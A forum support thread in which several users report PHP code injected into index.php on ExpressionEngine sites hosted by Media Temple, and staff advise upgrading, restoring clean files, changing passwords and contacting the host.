Just wanted to let you guys know that two of my sites were recently taken offline due to a php injection into the index.php files in EE (running 1.6.8 and 1.5.2).

Here was the error I received when loading one of the sites:

Parse error: syntax error, unexpected T_STRING in /nfs/c02/h06/mnt/15909/domains/sahadeva.com/html/index.php on line 60

Here was the code being injected into the site:

I removed the code, updated the passwords for my EE install and FTP accounts. Things seem to be working again now - anything I can do besides changing my passwords?

Mod Edit: Moved to the Technical Support Forum

Thank your for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. We need some additional information from you.

Is that a version of EE Core? What exact version and build are we dealing with? Do you have any other scripts on your account, whether in use or not (phpBB, etc…)

If this is a shared hosting environment, the host can help us find the vector of attack. These attacks quite often start with some other script, even some other account on the server and spread from there.

To that, what is being hacked and changed? If you look through:

- path.php
- config.php
- index.php

Do you see malicious code being put in there or in other locations?

My suggestion would be to upgrade all installs to the latest version and build, completely replacing all files with known good copies, and change all of your passwords.

Although I have no reason to think this an issue with EE, we would very much like to get to the bottom of it.

Hi -
I have had this happen to two EE sites recently, both on mediatemple servers (different account holders)
And thoughts on how I can stop this occurring again?

One site is running 1.6.7 and the other is latest 1.6.8 build.

leegreen - 23 November 2009 01:47 AM

I have had this happen to two EE sites recently, both on mediatemple servers (different account holders)
And thoughts on how I can stop this occurring again?

Please understand that we have no reason to assume this to be an issue with EE. What we recommend in cases like that is to notify your host and work with them to understand how this break-in occurred, change all of your passwords (EE, FTP, MySQL) and replace all of your files with known good copies downloaded from our site, upgrading to the latest version and build in the process if you haven’t done so.

One site is running 1.6.7 and the other is latest 1.6.8 build.

Yes, we always recommend to use the latest major version for security reasons. Even so, the recent series of events was a problem with MT (and limited to their servers).

This happened today to my client’s website while I was working in the Control Panel! ... “I just popped out the back for a few minutes and when I returned someone had stolen all my stuff!”

No website (index.php “Parse error: syntax error, unexpected T_STRING in /nfs/c04/h04/mnt/67006/domains/zok.com/html/index.php on line 61” )

Removed code, pushed up new clean page and website back online.
Checked for other signs of intrusion - nothing.
Passwords being changed.

FYI (1.6.7 build 111) They have the 1.6.8 stuff to upgrade but we resisted while we worked towards a launch three weeks ago.
Maybe we need to move to 1.6.8 this weekend, just to be on the safe side?

We have informed (mt) of the ‘break-in’. Still awaiting their reply.

Another (mt) (grid server)hosted site - so there is a pattern.

I got an email today from them, about my own account, not the client’s one.

Priority maintenance on DVS platform

To address a potentially critical security hole in the DVS platform, it
was necessary to restart all the VSes in order to enable the software
fix.

This restart was performed as a matter of urgent priority during the
early hours of Wednesday 25th November 2009.

Let’s hope they ‘fess up - after all we all make mistake sometime - its just embarrassing and damaging after I recommended them after giving me 5 years rock solid web support.

Ho hum…

Hi HEX32-
Thanks for reporting this. If you hear anything back from Media Temple, please let us know.

In regards to upgrading to 1.6.8. While this security issue is almost certainly a Media Temple issue, we certainly recommend upgrading to 1.6.8, as it has some important fixes and security updates.

Thanks again for keeping us informed!